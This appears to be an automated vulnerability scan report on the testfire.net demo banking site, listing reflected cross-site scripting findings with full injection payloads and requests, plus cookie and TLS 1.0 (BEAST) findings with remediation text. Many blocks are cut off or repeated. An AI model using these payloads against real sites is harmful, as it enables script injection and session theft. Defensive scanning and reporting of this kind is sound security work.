http://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00127)//>*/alert(15650660.00127)/*
Detection: An alert was detected containing 15650660.00127
Request: GET
http://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/search.jsp?query=%3Cscript%3Ealert%2
815650661.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650661.00037)</script>
Detection: An alert was detected containing 15650661.00037
Request: GET
https://demo.testfire.net:8443/search.jsp?query=%3Cscript%3Ealert%2
815650661.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117:8443/sendFeedback - name
Injection: <script>alert(15650661.00557)</script>
Detection: An alert was detected containing 15650661.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650661.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00617)//>*/alert(15650660.00617)/*
Detection: An alert was detected containing 15650660.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00617%29%2F%
2F%3E*%2Falert%2815650660.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net:8080/util/serverStatusCheckService.jsp?HostNa
me=%3Cscript%3Ealert%2815650659.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650659.00947)</script>
Detection: An alert was detected containing 15650659.00947
Request: GET
http://demo.testfire.net:8080/util/serverStatusCheckService.jsp?HostNa
me=%3Cscript%3Ealert%2815650659.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: http://demo.testfire.net:8080/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117:8080/index.jsp?content=javascript%3A%2F%2F%
27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2
Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00127)//>*/alert(15650660.00127)/*
Detection: An alert was detected containing 15650660.00127
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117:8080/sendFeedback - name
Injection: <script>alert(15650660.00467)</script>
Detection: An alert was detected containing 15650660.00467
cfile=comments.txt&name=%3Cscript%3Ealert%2815650660.00467%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net:8443/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00617)//>*/alert(15650661.00617)/*
Detection: An alert was detected containing 15650661.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00617%29%2F%
2F%3E*%2Falert%2815650661.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650659.00617%29%2F%
2F%3E*%2Falert%2815650659.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%
2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscri
pt%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00127%29%2F%
2F%3E*%2Falert%2815650642.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650642.00127)//>*/alert(15650642.00127)/*
Detection: An alert was detected containing 15650642.00127
Request: GET
https://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%
2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscri
pt%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00127%29%2F%
2F%3E*%2Falert%2815650642.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
2F%3E*%2Falert%2815650661.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00127)//>*/alert(15650661.00127)/*
Detection: An alert was detected containing 15650661.00127
Request: GET
https://demo.testfire.net:8443/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%28156506
56.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650656.00037)</script>
Detection: An alert was detected containing 15650656.00037
Request: GET
http://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%28156506
56.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%28156
50658.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650658.00037)</script>
Detection: An alert was detected containing 15650658.00037
Request: GET
https://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%28156
50658.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00127%29%2F%
2F%3E*%2Falert%2815650658.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650658.00127)//>*/alert(15650658.00127)/*
Request: GET
https://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00127%29%2F%
2F%3E*%2Falert%2815650658.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net/sendFeedback - name
Injection: <script>alert(15650658.00597)</script>
Detection: An alert was detected containing 15650658.00597
cfile=comments.txt&name=%3Cscript%3Ealert%2815650658.00597%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = b95638afc2ebb1aeee06e0a48503002c
Path = /
Host = demo.testfire.net
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Secure flag must be set for Session Cookies for Application served over
152 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 Vulnerable to CBC Attacks via chosen-plaintext (BEAST) 4.3 Medium Fail
Port: tcp/8443
This server supports a version of SSL vulnerable to a Cipher Block
Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such an attack.
CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers have TLS 1.1 and 1.2 enabled by
default, disabling earlier versions may prevent services other than
HTTP from connecting to the server if they do not support these
versions of TLS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2815650
642.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650642.00037)</script>
Detection: An alert was detected containing 15650642.00037
Request: GET
https://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2815650
642.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117/sendFeedback - name
Injection: <script>alert(15650656.00407)</script>
Detection: An alert was detected containing 15650656.00407
cfile=comments.txt&name=%3Cscript%3Ealert%2815650656.00407%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net:8080/sendFeedback - name
Injection: <script>alert(15650659.00577)</script>
Detection: An alert was detected containing 15650659.00577
cfile=comments.txt&name=%3Cscript%3Ealert%2815650659.00577%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117:8080/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00617)//>*/alert(15650660.00617)/*
Detection: An alert was detected containing 15650660.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00617%29%2F%
2F%3E*%2Falert%2815650660.00617%29%
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117:8443/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00617)//>*/alert(15650661.00617)/*
Detection: An alert was detected containing 15650661.00617
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117:8443/index.jsp?content=javascript%3A%2F%2F
%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
Request: GET
https://65.61.137.117:8443/index.jsp?content=javascript%3A%2F%2F
%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
2F%3E*%2Falert%2815650661.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%281565
0660.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650660.00037)</script>
Detection: An alert was detected containing 15650660.00037
Request: GET
http://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%281565
0660.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650660.00947)</script>
Detection: An alert was detected containing 15650660.00947
Request: GET
http://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: http://demo.testfire.net/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net/sendFeedback - name
Injection: <script>alert(15650660.00557)</script>
Detection: An alert was detected containing 15650660.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650660.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
